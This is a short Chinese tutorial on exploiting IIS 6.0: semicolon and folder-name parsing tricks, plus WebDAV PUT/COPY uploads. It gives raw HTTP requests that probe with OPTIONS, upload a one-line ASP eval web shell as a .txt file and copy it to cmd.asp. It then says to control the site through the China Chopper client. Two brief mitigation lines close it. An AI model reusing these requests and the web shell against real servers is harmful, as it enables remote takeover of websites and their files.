ISS6.0解析漏洞介绍
(1) 当建立*.asa、.asp格式的文件夹时,其目录下的任意文件都将被IIS当作为asp文件解析。
(2) 当文件.asp;*.jpg IIS6.0同样会将文件当做asp文件解析。
注:微软目前也没有推出补丁,不认为是一个漏洞
ISS6.0 PUT上传原理
WeDAV基于HTTP1.1协议的通信协议使得HTTP支持PUT MOVE COPY DELETE方法。
1.在kali利用nikto探测URL通信协议情况。
2.探测是否存在PUT漏洞:
OPTIONS /HTTP1.1
Host:www.xxx.com
3.上传txt文本文件
PUT /*.txt HTTP1.1
Host:www.xxx.com
Content-Length:30
<%eval request(“shezhang”)%>
4.通过Move或Copy重名
COPY /*.txt HTTP1.1
Host:www.xxx.com
Destination:
http://www.xxx.com/cmd.asp
IIS6.0 PU上传利用
使用中国菜刀,连接目录中上传的木马文件,操作站点系统中的文件。
Iss6.0默认的可执行文件
除了asp还包括这三种:
/test.asa(<%=now()%>)
/test.cer
/test.cdx
Iss6.0解析配置
IIS6.0的修复方案
1.目前尚无微软官方的补丁,可以通过编写正则,阻止上传xx.asp;.jpg类型的文件名
2.做好权限设置,限制用户创建文件夹
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
